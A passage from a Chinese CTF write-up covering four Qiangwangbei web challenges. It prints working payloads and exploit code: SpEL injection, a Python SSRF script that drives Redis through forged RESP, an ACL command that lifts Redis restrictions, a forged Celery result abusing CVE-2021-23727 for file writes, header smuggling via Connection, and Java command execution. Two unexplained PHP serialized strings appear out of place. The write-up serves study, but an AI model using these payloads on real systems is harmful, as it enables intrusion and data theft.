跳过正文

强网杯 WEB WriteUp

·7654 字·16 分钟
LXY
作者
LXY
网络安全业余爱好者,热衷于记录实战经验、分享工具与技术,致力于持续学习与成长。
目录

bbjv
#

代码审计
#

GatewayController
#

package com.ctf.gateway.controller;

import com.ctf.gateway.service.EvaluationService;
import [java.io](http://java.io).BufferedReader;
import [java.io](http://java.io).File;
import [java.io](http://java.io).FileNotFoundException;
import [java.io](http://java.io).FileReader;
import [java.io](http://java.io).IOException;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class GatewayController {
    private final EvaluationService evaluationService;

    public GatewayController(EvaluationService evaluationService) {
        this.evaluationService = evaluationService;
    }

    @GetMapping({"/check"})
    public String checkRule(@RequestParam String rule) throws FileNotFoundException {
        String result = this.evaluationService.evaluate(rule);

        File flagFile = new File(System.getProperty("user.home"), "flag.txt");
        if (flagFile.exists()) {
            try (BufferedReader br = new BufferedReader(new FileReader(flagFile))) {
                String content = br.readLine();
                result = result + "<br><b>🚩 Flag:</b> " + content;
            } catch (IOException e) {
                throw new RuntimeException(e);
            }
        }
        return result;
    }
}

EvaluationService
#

package com.ctf.gateway.service;

import org.springframework.expression.EvaluationContext;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.stereotype.Service;

@Service
public class EvaluationService {
    private final ExpressionParser parser = new SpelExpressionParser();
    private final EvaluationContext context;

    public EvaluationService(EvaluationContext context) {
        this.context = context;
    }

    public String evaluate(String expression) {
        try {
            Object result = this.parser
                .parseExpression(expression, new TemplateParserContext())
                .getValue(this.context);
            return "Result: " + String.valueOf(result);
        } catch (Exception e) {
            return "Error: " + e.getMessage();
        }
    }
}

安全提示:当前实现将用户输入直接传给 SpEL 解析器,存在 SpEL 注入导致 RCE、信息泄露与路径操控风险。


运行流程图(代码运行逻辑)
#

┌──────────────────────────┐
│ 客户端请求               │
│ GET /check?rule={expr}   │
└────────────┬─────────────┘
             │ rule 原样传入
             v
┌──────────────────────────┐
│ GatewayController.check  │
└────────────┬─────────────┘
             │ 调用 evaluate(rule)
             v
┌──────────────────────────┐
│ EvaluationService        │
│ - SpelExpressionParser   │
│ - TemplateParserContext  │
└────────────┬─────────────┘
             │ 解析并求值 expr
             v
┌──────────────────────────┐
│ 结果字符串 result        │
└────────────┬─────────────┘
             │ 继续在 Controller
             │ 读取 System.getProperty("user.home")
             │ 拼接 "flag.txt"
             v
┌──────────────────────────┐
│ 如果 user.home/flag.txt  │───否──► 返回 result
│ 存在?                    │
└────────────┬─────────────┘
             │是
             v
┌──────────────────────────┐
│ 读取首行内容 content     │
│ result += "🚩 " + content │
└────────────┬─────────────┘
             v
┌──────────────────────────┐
│ 返回最终响应              │
└──────────────────────────┘

运行逻辑详解(精简)
#

  • 路由入口:GET /check 接收参数 rule。
  • 表达式求值:EvaluationService 使用 SpEL 对 rule 求值,支持模板语法 #{…}。
  • 文件读取:Controller 依据 System.getProperty(“user.home”) 组合 flag.txt 路径并尝试读取。
  • 输出:返回求值结果,若读取到 flag 则附加到响应中。

漏洞分析(重点)
#

  • SpEL 注入(高危):用户可控的 expression 直接被 SpEL 求值,若上下文为标准上下文,可用 T() 访问类、调用静态方法、构造进程等,进而 RCE 或读敏感信息。
  • 路径操控(中危):通过 SpEL 修改 #systemProperties[‘user.home’],可影响后续 flag 读取路径,间接实现任意目录下 flag.txt 的读取或与文件上传联动。

典型利用:

#{#systemProperties['user.home']='/tmp'}

随后程序将读取 /tmp/flag.txt 并回显。


修复建议(可落地)
#

  1. 禁止直评用户表达式:仅允许预定义键到表达式的白名单映射。
Map<String,String> allowed = Map.of(
  "check1", "#{someBean.method1()}",
  "check2", "#{someBean.method2()}"
);
String exp = allowed.get(rule);
if (exp == null) throw new IllegalArgumentException("invalid rule");
parser.parseExpression(exp).getValue(context);
  1. 受限上下文:用 SimpleEvaluationContext 禁用类型访问与反射能力。
SimpleEvaluationContext sec = SimpleEvaluationContext
  .forReadOnlyDataBinding()
  .withInstanceMethods()
  .build();
  1. 输入校验:若业务必须接受自由文本,使用严格模式和正则白名单,仅保留安全子集。
private static final Pattern SAFE = Pattern.compile("^[a-zA-Z0-9_]+$");
  1. 固定敏感路径:避免依赖可变系统属性,改为只读绝对路径并加最小权限。
Path FLAG = Paths.get("/var/app/secrets/flag.txt");
  1. 运行时最小权限:应用低权限用户运行,限制文件系统与进程创建能力。

复现
#

修改 user.home:#{#systemProperties['user.home']='/tmp'} 访问 /check 验证是否被读取。


总结
#

本程序的核心风险在于对用户输入的 SpEL 直评与对 user.home 的信任。攻击者可借此实现表达式注入与路径操控,导致信息泄露乃至 RCE。修复应同时从“禁用直评、收紧上下文、白名单校验、固定路径、最小权限”多点入手,确保即使单点失效也不至于被完全攻破。

CeleRace
#

代码审计
#

@app.post("/tasks/fetch/<path:target>", middlewares=[require_admin])
def queue_fetch(target: str):
    payload = request.get_json(silent=True) or {}
    url = payload.get("url") or target
    verb = payload.get("verb", "GET")
    if not url:
        return jsonify({"error": "url required"}, status=400)
    host_header = payload.get("host")
    body = payload.get("body")
    return _queue("miniws.fetch", url=url, host_header=host_header, body=body, verb=verb)

这道题审计源码后,很明显的能够发现在/tasks/fetch/path:target下是存在一处SSRF的,乍一看似乎是发起http请求的SSRF,但是后续测试中,以打下redis为目标,猜测可以在verb字段进行一个伪造RESP数据流的包进行攻击,url字段只是提供一个目标ip

@celery_app.task(name="miniws.fetch")
def fetch_task(url: str, *, host_header: str | None = None, body: str | None = None, verb: str = "GET") -> Dict[str, Any]:
    parsed = urlparse(url)
    host = parsed.hostname or settings.redis_host
    port = parsed.port or (443 if parsed.scheme == "https" else 80)
    path = parsed.path or "/"
    if parsed.query:
        path = f"{path}?{parsed.query}"

    request_host = host_header or parsed.netloc or f"{host}:{port}"
    request_body = body.encode() if body else b""

    payload = (
        f"{verb} {path} HTTP/1.1\r\n"
        f"Host: {request_host}\r\n"
        "User-Agent: MiniFetch/1.0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode() + request_body

    chunks: list[bytes] = []
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(payload)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    preview = b"".join(chunks)[:2048]
    return {"preview": preview.decode(errors="replace"), "bytes": len(preview)}

但是显而易见的,这个接口上存在一个flask的修饰器去进行一个鉴权。

这里是通过path传入参数因此有理由怀疑出题者的意图在于发现了一个WSGI处理逻辑上的缺陷绕制能直接步入接口中

绕过require_admin的思路很快锁定在了两个方向:

  • 黑盒FUZZ
  • 对framework中的框架代码进行debug,发现其中的处理缺陷

解题
#

访问/tasks/fetch/../即可绕过权限

SSRF
#

import json
import requests
URL = "http://127.0.0.1:5001/"
def to_resp(command_line: str) -> str:
    args = command_line.strip().split()
    resp = f"*{len(args)}\r\n"
    for arg in args:
        resp += f"${len(arg)}\r\n{arg}\r\n"
    return resp + "\r\n\r\n\r\n\r\n*3"
def exp(verb):
    # print(verb)
    r = requests.post(
        url=URL+ "/tasks/fetch/%2e%2e%2f%61",
        json={
            "url": "dict://127.0.0.1:6379/",
            "verb": verb
        }
    )
    task_id = r.json().get('task_id')
    # print(task_id)
    r = requests.get(
        url=URL+ "/tasks/result",
        params={
            "id": task_id
        }
    )
    res = r.json().get('result').get('preview')
    return res
if __name__ == "__main__":
    while True:
        cmd = input("redis-cli> ")
        if cmd.lower() in ('exit', 'quit'):
            break
        resp_str = to_resp(cmd)
        res = exp(resp_str)
        print(res)

前面SSRF探测过环境不可出网,且在redis.acl中发现对CONFIG这类指令权限控制的是挺死的,虽然可以直接用ACL指令关掉限制

ACL SETUSER default on ~* +@all nopass

但是redis版本过高,无法直接在redis-cli中修改dir、dbfilename等保护属性,也打不了前段时间的redis UAF

恶意类
#

整个代码让ai帮忙分析后,不难发现一个类DiagnosticsPersistError,这个类是一个自定义的Error类,但是很明显在整个项目中都没有使用到它,而且它的功能也非常可疑:

它的_maybe_persist方法中,很明显的存在一个任意文件写的点

    def _maybe_persist(self, payload: str) -> None:
        info = self._decode_payload(payload)
        if not info:
            return

        target = info.get("path")
        if not target:
            return

        path = Path(target)
        mode = str(info.get("mode", "w"))
        encoding = info.get("encoding", "utf-8")
        data = info.get("content", "")

        try:
            path.parent.mkdir(parents=True, exist_ok=True)
            if "b" in mode:
                blob = self._ensure_bytes(data, encoding)
                with path.open(mode) as fh:  # type: ignore[call-arg]
                    fh.write(blob)
            else:
                text = self._ensure_text(data, encoding)
                with path.open(mode, encoding=encoding) as fh:
                    fh.write(text)
        except Exception:
            return

并且可以看到在它的构造方法中去调用了这个可疑的方法,但是存在一个条件,就是需要写/tmp/debug这个文件

class DiagnosticsPersistError(RuntimeError):
    """Dormant exception used for development-time diagnostics persistence."""

    _BASE_DIR = Path(os.environ.get("FRAMEWORK_DIAGNOSTICS_DIR", "/app/data")).resolve()
    _DEBUG_SENTINEL = Path("/tmp/debug")

    def __init__(self, payload: str, *args: Any, **kwargs: Any) -> None:
        if self._DEBUG_SENTINEL.exists():
            self._maybe_persist(payload)
        super().__init__("diagnostics capture failed", *args, **kwargs)

    def _maybe_persist(self, payload: str) -> None:
        info = self._decode_payload(payload)
        if not info:
            return

写文件
#

拿到redis权限后,又要写文件,这里的第一反应应该是使用config set去设置redis的数据库来写文件,但是我们在上面已经提到了由于redis版本过高这是行不通的。那怎么办呢?

我们将视角切换到框架中,寻找有没有其他地方可以写文件

很快我们会发现存在这样一个FileSessionManager类,用来将session持久化保存在磁盘中

class FileSessionManager:
    """Manage loading and storing of file-based sessions."""

    def __init__(self, secret: str = "devsecret", directory: str = "/tmp/sess", cookie_name: str = "mini_session", nonce_bytes: int = 8) -> None:
        self.secret = secret.encode() if isinstance(secret, str) else secret
        self.directory = directory
        self.cookie_name = cookie_name
        self.nonce_bytes = nonce_bytes
        os.makedirs(self.directory, exist_ok=True)

保存session文件会调用下面这个方法,最终保存路径为path

    def save(self, session: FileSession) -> None:
        if not session.modified:
            return
        path = self._session_path(session.sid)
        tmp_path = f"{path}.tmp-{secrets.token_hex(4)}"
        payload = {key: value for key, value in session.items()}
        with open(tmp_path, "w", encoding="utf-8") as fh:
            json.dump(payload, fh, ensure_ascii=False, separators=(",", ":"))
        os.replace(tmp_path, path)
        session.modified = False

而我们去看看path的处理逻辑,非常明显的,这里存在一个路径拼接的漏洞

    def _session_path(self, sid: str) -> str:
        return os.path.join(self.directory, f"{sid}")

怎么去控制这个路径呢,实际上很容易发现就是将mini_session这个cookie的值改为../debug即可

CVE‑2021‑23727
#

到目前为止实际上最大的问题就是如何去实例化那个DiagnosticsPersistError,如果能够实例化它其实已经有很明确的思路就是写pycache去执行任意代码了,但是如何触发呢,联系到题目给出的celery,搜索引擎中搜索一下Celery的漏洞

https://security.snyk.io/vuln/SNYK-PYTHON-CELERY-2314953

本地尝试运行给出的poc,发现提示报错,即需要实例化的类必须是一个exception,题目中给的这个可疑的类不正好是RuntimeError么

进行一个小改

from celery.backends.base import Backend
from celery import Celery
from framework.app import DiagnosticsPersistError

b = Backend(Celery())
exc = {'exc_module': 'framework.app', 'exc_type': 'DiagnosticsPersistError', 'exc_message': 'test'}
b.exception_to_python(exc)

分析一下一个正常的任务的序列化数据的格式:

get celery-task-meta-eafa2211-9622-492b-bda6-78f7b88d7701
{"status": "SUCCESS", "result": {"echo": ""}, "traceback": null, "children": [], "date_done": "2025-10-28T06:06:31.343924", "task_id": "eafa2211-9622-492b-bda6-78f7b88d7701"}

这里合理猜测将status改为FAILURE,result改成我们预设的恶意payload

set celery-task-meta-eafa2211-9622-492b-bda6-78f7b88d7701 {"status":"RETRY","result":{"exc_module":"framework.app","exc_type":"DiagnosticsPersistError","exc_message":"7b0d0a202020202270617468223a20222f746d702f7465737474747474222c0d0a20202020226d6f6465223a202277222c0d0a2020202022656e636f64696e67223a20227574662d38222c0d0a2020202022636f6e74656e74223a2022706f7461746f206861636b6564220d0a7d0d0a"},"traceback":null,"children":[],"date_done":"2025-10-28T06:06:31.343924","task_id":"eafa2211-9622-492b-bda6-78f7b88d7701"}

触发一下

成功上传testtttt

O%3A4%3A%22test%22%3A3%3A%7Bs%3A8%3A%22readflag%22%3Bs%3A4%3A%22%2Ffl%2A%22%3Bs%3A1%3A%22f%22%3Bs%3A8%3A%22readfile%22%3Bs%3A3%3A%22key%22%3Bs%3A4%3A%22func%22%3B%7D
O%3A4%3A%22test%22%3A3%3A%7Bs%3A8%3A%22readflag%22%3Bs%3A3%3A%22123%22%3Bs%3A1%3A%22f%22%3Bs%3A4%3A%22test%22%3Bs%3A3%3A%22key%22%3Bs%3A5%3A%22class%22%3B%7D

SecretVault
#

注册登录

代码审计
#

app.py

import base64
import os
import secrets
import sys
from datetime import datetime
from functools import wraps
import requests

from cryptography.fernet import Fernet
from flask import (
    Flask,
    flash,
    g,
    jsonify,
    make_response,
    redirect,
    render_template,
    request,
    url_for,
)
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.exc import IntegrityError
import hashlib

## 模块说明:
## 这个 Flask 应用实现了一个简单的“密码保险库”(Vault)服务。
## - 提供用户注册、登录、登出功能。
## - 将各类服务的账号/密码以加密形式存储在数据库中(使用 Fernet 对称加密)。
## - 通过远程的签名服务(SIGN_SERVER)为登录用户签发 token,并把用户标识通过请求头 `X-User` 转发给后端应用。
## 注意:在生产环境中,需要妥善管理 `FERNET_KEY` 和签名密钥,避免敏感数据泄露。

db = SQLAlchemy()

class User(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True, nullable=False)
    password_hash = db.Column(db.String(128), nullable=False)
    salt = db.Column(db.String(64), nullable=False)
    created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)
    vault_entries = db.relationship('VaultEntry', backref='user', lazy=True, cascade='all, delete-orphan')

## User 表保存注册用户的信息:
## - username: 登录名(唯一)
## - password_hash: 经多轮 SHA256 哈希并 base64 编码的密码摘要(不可逆)
## - salt: 用于防止彩虹表的随机值(以 base64 编码存储)

class VaultEntry(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    label = db.Column(db.String(120), nullable=False)
    login = db.Column(db.String(120), nullable=False)
    password_encrypted = db.Column(db.Text, nullable=False)
    notes = db.Column(db.Text)
    created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)

## VaultEntry 表保存各条密码记录:
## - password_encrypted 字段保存的是使用 FERNET_KEY 加密后的密文(字符串形式)

def hash_password(password: str, salt: bytes) -> str:
    data = salt + password.encode('utf-8')
    for _ in range(50):
        data = hashlib.sha256(data).digest()
    return base64.b64encode(data).decode('utf-8')

## 对密码进行加盐并多轮哈希后返回 base64 编码的摘要。
## 这里使用 50 轮 SHA256 以增加暴力破解成本(但在生产应使用更强的 KDF,比如 PBKDF2/Argon2)。

def verify_password(password: str, salt_b64: str, digest: str) -> bool:
    salt = base64.b64decode(salt_b64.encode('utf-8'))
    return hash_password(password, salt) == digest

def generate_salt() -> bytes:
    return secrets.token_bytes(16)

## 随机生成 16 字节盐值

def create_app() -> Flask:
    app = Flask(__name__)
    app.config['SECRET_KEY'] = secrets.token_hex(32)
    app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', 'sqlite:///vault.db')
    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
    app.config['SIGN_SERVER'] = os.getenv('SIGN_SERVER', 'http://127.0.0.1:4444/sign')
    fernet_key = os.getenv('FERNET_KEY')
    if not fernet_key:
        # 强制要求设置 FERNET_KEY 环境变量:这是对称加密的密钥,用于加密/解密密码条目。
        # 如果没有该密钥,程序会直接报错并退出,避免以明文写入敏感信息。
        raise RuntimeError('Missing FERNET_KEY environment variable. Generate one with `python -c "from cryptography.fernet import Fernet; print(Fernet.generate_key().decode())"`.')
    app.config['FERNET_KEY'] = fernet_key
    db.init_app(app)

    fernet = Fernet(app.config['FERNET_KEY'])
    with app.app_context():
        db.create_all()

        if not User.query.first():
            salt = secrets.token_bytes(16)
            password = secrets.token_bytes(32).hex()
            password_hash = hash_password(password, salt)
            user = User(
                id=0,
                username='admin',
                password_hash=password_hash,
                salt=base64.b64encode(salt).decode('utf-8'),
            )
            db.session.add(user)
            db.session.commit()

            # 初始化时为演示/挑战环境创建一个 admin 用户并把 flag 写入一个 VaultEntry
            # 注意:真实场景中不应在代码中直接读取 /flag 或在初始化流程中写入敏感标记。
            # 这里保留原有逻辑,但提醒该行为仅供测试/CTF 用途。
            flag = open('/flag').read().strip()
            flagEntry = VaultEntry(
                user_id=user.id,
                label='flag',
                login='flag',
                password_encrypted=fernet.encrypt(flag.encode('utf-8')).decode('utf-8'),
                notes='This is the flag entry.',
            )
            db.session.add(flagEntry)
            db.session.commit()

    def login_required(view_func):
        @wraps(view_func)
        def wrapped(*args, **kwargs):
            uid = request.headers.get('X-User', '0')
            print(uid)
            # 该中间件依赖于反向代理/授权服务在请求头 `X-User` 中注入用户 id。
            # - 若 `X-User` 为 'anonymous' 或未设置,则认为未登录并重定向到登录页。
            # - 注意:此处并没有验证 token 本身,信任了上游服务对用户身份的判断。
            if uid == 'anonymous':
                flash('Please sign in first.', 'warning')
                return redirect(url_for('login'))
            try:
                uid_int = int(uid)
            except (TypeError, ValueError):
                flash('Invalid session. Please sign in again.', 'warning')
                return redirect(url_for('login'))
            user = User.query.filter_by(id=uid_int).first()
            if not user:
                flash('User not found. Please sign in again.', 'warning')
                return redirect(url_for('login'))

            g.current_user = user
            return view_func(*args, **kwargs)

        return wrapped

    @app.route('/')
    def index():
        uid = request.headers.get('X-User', '0')
        if not uid or uid == 'anonymous':
            return redirect(url_for('login'))

        return redirect(url_for('dashboard'))

    @app.route('/register', methods=['GET', 'POST'])
    def register():
        if request.method == 'POST':
            username = request.form.get('username', '').strip()
            password = request.form.get('password', '')
            confirm_password = request.form.get('confirm_password', '')
            if not username or not password:
                flash('Username and password are required.', 'danger')
                return render_template('register.html')
            if password != confirm_password:
                flash('Passwords do not match.', 'danger')
                return render_template('register.html')
            salt = generate_salt()
            password_hash = hash_password(password, salt)
            user = User(
                username=username,
                password_hash=password_hash,
                salt=base64.b64encode(salt).decode('utf-8'),
            )
            db.session.add(user)
            try:
                db.session.commit()
            except IntegrityError:
                db.session.rollback()
                flash('Username already exists. Please choose another.', 'warning')
                return render_template('register.html')
            flash('Registration successful. Please sign in.', 'success')
            return redirect(url_for('login'))
        return render_template('register.html')

    @app.route('/login', methods=['GET', 'POST'])
    def login():
        if request.method == 'POST':
            username = request.form.get('username', '').strip()
            password = request.form.get('password', '')
            user = User.query.filter_by(username=username).first()
            if not user or not verify_password(password, user.salt, user.password_hash):
                flash('Invalid username or password.', 'danger')
                return render_template('login.html')
            # 向独立的签名服务请求签名 token(通常该服务会验证来源并返回签名好的 token)
            # SIGN_SERVER 的默认地址在配置项 `SIGN_SERVER` 中,可由环境变量覆盖。
            r = requests.get(app.config['SIGN_SERVER'], params={'uid': user.id}, timeout=5)
            if r.status_code != 200:
                flash('Unable to reach the authentication server. Please try again later.', 'danger')
                return render_template('login.html')

            token = r.text.strip()
            response = make_response(redirect(url_for('dashboard')))
            response.set_cookie(
                'token',
                token,
                httponly=True,
                secure=app.config.get('SESSION_COOKIE_SECURE', False),
                samesite='Lax',
                max_age=12 * 3600,
            )
            return response
        return render_template('login.html')

    @app.route('/logout')
    def logout():
        response = make_response(redirect(url_for('login')))
        response.delete_cookie('token')
        flash('Signed out.', 'info')
        return response

    @app.route('/dashboard')
    @login_required
    def dashboard():
        user = g.current_user
        entries = [
            {
                'id': entry.id,
                'label': entry.label,
                'login': entry.login,
                'password': fernet.decrypt(entry.password_encrypted.encode('utf-8')).decode('utf-8'),
                'notes': entry.notes,
                'created_at': entry.created_at,
            }
            for entry in user.vault_entries
        ]
        return render_template('dashboard.html', username=user.username, entries=entries)

    @app.route('/passwords/new', methods=['POST'])
    @login_required
    def create_password():
        user = g.current_user
        label = request.form.get('label', '').strip()
        login_value = request.form.get('login', '').strip()
        password_plain = request.form.get('password', '').strip()
        notes = request.form.get('notes', '').strip() or None
        if not label or not login_value or not password_plain:
            flash('Service name, login, and password are required.', 'danger')
            return redirect(url_for('dashboard'))
        encrypted_password = fernet.encrypt(password_plain.encode('utf-8')).decode('utf-8')
        entry = VaultEntry(
            user_id=user.id,
            label=label,
            login=login_value,
            password_encrypted=encrypted_password,
            notes=notes,
        )
        db.session.add(entry)
        db.session.commit()
        flash('Password entry saved.', 'success')
        return redirect(url_for('dashboard'))

    @app.route('/passwords/<int:entry_id>', methods=['DELETE'])
    @login_required
    def delete_password(entry_id: int):
        user = g.current_user
        entry = VaultEntry.query.filter_by(id=entry_id, user_id=user.id).first()
        if not entry:
            return jsonify({'success': False, 'message': 'Entry not found'}), 404
        db.session.delete(entry)
        db.session.commit()
        return jsonify({'success': True})

    return app

if __name__ == '__main__':
    flask_app = create_app()
    flask_app.run(host='127.0.0.1', port=5000, debug=False)

main.go

// 定义包名为main,表示这是一个可执行程序
package main

import (
	"crypto/rand"
	"encoding/hex"
	"fmt"
	"log"
	"net/http"
	"net/http/httputil"
	"strings"
	"time"

	"github.com/golang-jwt/jwt/v5"
	"github.com/gorilla/mux"
)

// 定义全局变量SecretKey,用于JWT签名
// 使用RandomBytes生成32字节随机数,然后转换为十六进制字符串
var (
	SecretKey = hex.EncodeToString(RandomBytes(32))
)

// 定义JWT声明结构体,包含标准声明和用户ID
type AuthClaims struct {
	jwt.RegisteredClaims        // 嵌入JWT标准声明
	UID                  string `json:"uid"` // 用户ID字段
}

// 生成指定长度的随机字节数组
func RandomBytes(length int) []byte {
	b := make([]byte, length)               // 创建指定长度的字节切片
	if _, err := rand.Read(b); err != nil { // 从加密安全的随机数生成器读取随机字节
		return nil // 如果出错返回nil
	}
	return b // 返回随机字节数组
}

// 为用户ID生成JWT令牌
func SignToken(uid string) (string, error) {
	// 创建新的JWT令牌,使用HS256签名方法
	t := jwt.NewWithClaims(jwt.SigningMethodHS256, AuthClaims{
		UID: uid, // 设置用户ID
		RegisteredClaims: jwt.RegisteredClaims{
			Issuer:    "Authorizer",                                  // 设置签发者
			Subject:   uid,                                           // 设置主题为用户ID
			ExpiresAt: jwt.NewNumericDate(time.Now().Add(time.Hour)), // 设置过期时间为1小时后
			IssuedAt:  jwt.NewNumericDate(time.Now()),                // 设置签发时间
			NotBefore: jwt.NewNumericDate(time.Now()),                // 设置生效时间
		},
	})
	// 使用密钥签名令牌
	tokenString, err := t.SignedString([]byte(SecretKey))
	if err != nil { // 如果签名失败
		return "", err // 返回空字符串和错误
	}
	return tokenString, nil // 返回签名后的令牌字符串
}

// 从HTTP请求中提取用户ID
func GetUIDFromRequest(r *http.Request) string {
	// 从请求头中获取Authorization字段
	authHeader := r.Header.Get("Authorization")
	if authHeader == "" { // 如果请求头中没有Authorization
		cookie, err := r.Cookie("token") // 尝试从Cookie中获取token
		if err == nil {                  // 如果Cookie存在
			authHeader = "Bearer " + cookie.Value // 构造Bearer格式的认证头
		} else { // 如果Cookie也不存在
			return "" // 返回空字符串
		}
	}
	// 检查Authorization头格式是否正确(至少7个字符且以"Bearer "开头)
	if len(authHeader) <= 7 || !strings.HasPrefix(authHeader, "Bearer ") {
		return "" // 格式不正确返回空字符串
	}
	// 提取令牌字符串(去掉"Bearer "前缀)
	tokenString := strings.TrimSpace(authHeader[7:])
	if tokenString == "" { // 如果令牌为空
		return "" // 返回空字符串
	}
	// 解析JWT令牌
	token, err := jwt.ParseWithClaims(tokenString, &AuthClaims{}, func(token *jwt.Token) (interface{}, error) {
		// 验证签名方法是否为HMAC
		if _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {
			return nil, fmt.Errorf("unexpected signing method: %v", token.Header["alg"])
		}
		return []byte(SecretKey), nil // 返回用于验证的密钥
	})
	if err != nil { // 如果解析失败
		log.Printf("failed to parse token: %v", err) // 记录错误日志
		return ""                                    // 返回空字符串
	}
	// 获取令牌声明并验证令牌有效性
	claims, ok := token.Claims.(*AuthClaims)
	if !ok || !token.Valid { // 如果声明类型不匹配或令牌无效
		log.Printf("invalid token claims") // 记录错误日志
		return ""                          // 返回空字符串
	}
	return claims.UID // 返回用户ID
}

// 主函数
func main() {
	// 创建反向代理,用于转发请求到后端服务
	authorizer := &httputil.ReverseProxy{Director: func(req *http.Request) {
		req.URL.Scheme = "http"         // 设置目标URL协议为HTTP
		req.URL.Host = "127.0.0.1:5000" // 设置目标主机和端口

		// 从请求中获取用户ID
		uid := GetUIDFromRequest(req)
		// 记录请求的用户ID和URL
		log.Printf("Request UID: %s, URL: %s", uid, req.URL.String())
		// 删除可能存在的认证相关头部
		req.Header.Del("Authorization")
		req.Header.Del("X-User")
		req.Header.Del("X-Forwarded-For")
		req.Header.Del("Cookie")

		// 根据用户ID设置X-User头部
		if uid == "" { // 如果没有用户ID
			req.Header.Set("X-User", "anonymous") // 设置为匿名用户
		} else { // 如果有用户ID
			req.Header.Set("X-User", uid) // 设置为实际用户ID
		}
	}}

	// 创建用于令牌签名的路由器
	signRouter := mux.NewRouter()
	// 注册/sign路由处理函数
	signRouter.HandleFunc("/sign", func(w http.ResponseWriter, r *http.Request) {
		// 检查请求是否来自本地(安全限制)
		if !strings.HasPrefix(r.RemoteAddr, "127.0.0.1:") {
			http.Error(w, "Forbidden", http.StatusForbidden) // 返回403禁止访问
		}
		// 从URL查询参数中获取用户ID
		uid := r.URL.Query().Get("uid")
		// 为用户ID生成令牌
		token, err := SignToken(uid)
		if err != nil { // 如果生成令牌失败
			log.Printf("Failed to sign token: %v", err)                               // 记录错误日志
			http.Error(w, "Failed to generate token", http.StatusInternalServerError) // 返回500错误
			return
		}
		w.Write([]byte(token)) // 将令牌写入响应
	}).Methods("GET") // 限制只接受GET请求

	// 记录令牌服务启动信息
	log.Println("Sign service is running at 127.0.0.1:4444")
	// 在goroutine中启动令牌服务
	go func() {
		if err := http.ListenAndServe("127.0.0.1:4444", signRouter); err != nil {
			log.Fatal(err) // 如果启动失败则退出程序
		}
	}()

	// 记录授权中间件服务启动信息
	log.Println("Authorizer middleware service is running at :5555")
	// 启动授权中间件服务
	if err := http.ListenAndServe(":5555", authorizer); err != nil {
		log.Fatal(err) // 如果启动失败则退出程序
	}
}

entrypoint.sh

#!/bin/sh

chmod 600 /entrypoint.sh

if [ ${ICQ_FLAG} ];then
    echo -n ${ICQ_FLAG} > /flag
    chown vault:nogroup /flag
    chmod 400 /flag
    echo [+] ICQ_FLAG OK
    unset ICQ_FLAG
else
    echo [!] no ICQ_FLAG
fi

start_authorizer() {
    su authorizer -s /bin/sh -c /app/authorizer/authorizer &
}

start_vault() {
    cd /app/vault && FERNET_KEY=$(python -c "from cryptography.fernet import Fernet; print(Fernet.generate_key().decode())") su vault -s /bin/sh -c "python3 app.py" &
}

start_authorizer
start_vault

wait -n

这段代码其实就是启动一下两个服务:

  1. Go授权服务 (authorizer)
  2. Flask保险库应用 (vault)

有一个admin管理员用户中存放了flag。那么接下来要做的就是进入admin管理员用户。

只要让请求有的X-User字段值为0就可以进入dashboard

客户端的请求是先发送到authorizer也就是go,然后再转发到vault也就是flask的。

  • authorizer (Go): 运行在:5555端口,作为所有传入请求的反向代理。它负责处理JWT认证,并根据认证结果设置X-User头部,然后将请求转发到vault服务(127.0.0.1:5000)。同时,它还在127.0.0.1:4444端口提供一个/sign接口,用于生成JWT。
  • vault(Flask): 运行在127.0.0.1:5000端口,是实际的密码保险库Web应用。它通过读取X-User头部来识别用户身份,并提供用户注册、登录、密码存储和查看等功能。Flag被存储在id=0admin用户的密码条目中。

但是在authorizer中会对我们的部分请求头进行删除和重建,那么我们简单地在请求头中添加X-User就没用了。

整理一下服务交互流程:

  1. 用户请求发送到authorizer服务(:5555)。
  2. authorizer解析请求中的Authorization头部或token cookie,提取JWT并验证。如果有效,则提取UID
  3. authorizer删除原始请求中的AuthorizationX-UserX-Forwarded-ForCookie头部。
  4. authorizer根据提取到的UID设置新的X-User头部(如果UID为空,则设置为anonymous)。
  5. authorizer将修改后的请求转发到vault服务(127.0.0.1:5000)。
  6. vault服务根据X-User头部进行用户认证和业务逻辑处理。

那么我们接下来就要想办法让go删除请求头后还能存在X-User!

解题
#

HTTP请求走私

authorizer(Go语言net/http/httputil.ReverseProxy)和vault(Flask)对HTTP请求头部的解析方式存在差异,导致请求边界的混淆。

Connection: close用于关闭连接,防止后续请求被误读。而X-User被添加到Connection头部中,这是一种常见的HTTP请求走私技术,用于在某些代理或服务器中导致X-User头部被错误地解析或保留,从而绕过authorizer的清理逻辑。

Connection: close,X-User

yamcs
#

题目分析
#

这道题基于一个 Yamcs Quickstart 环境。Yamcs 是一个开源的遥测与指挥控制系统,它提供一个 Web 界面来管理“项目(projects)”、“算法(algorithms)”、“模拟器(simulators)”等功能。

Yamcs 的 “Algorithms” 模块允许用户定义 JavaScript 或 Java 表达式,用来实时处理遥测数据。

但是出题人把“代码执行”功能放开了(通常应该禁用),于是我们可以编写 Java 代码并让它执行在服务端。这一步的作用是让算法运行时执行,并将输出显示在 Trace 面板中。Trace 面板会打印算法的输出变量值(包括异常、执行结果等),因此我们可以在那看到命令执行结果。

Yamcs 的算法执行环境支持 Java,因此可以直接写类似这样的代码:

Process process = Runtime.getRuntime().exec("cat /flag");

这样就能让服务器执行系统命令。不过,为了兼容性和安全性,WP 中用的命令是:

String[] commandArray = {"/usr/bin/env", "bash", "-c", "cat /flag"};
Process process = Runtime.getRuntime().exec(commandArray);

这段代码有几个关键点:

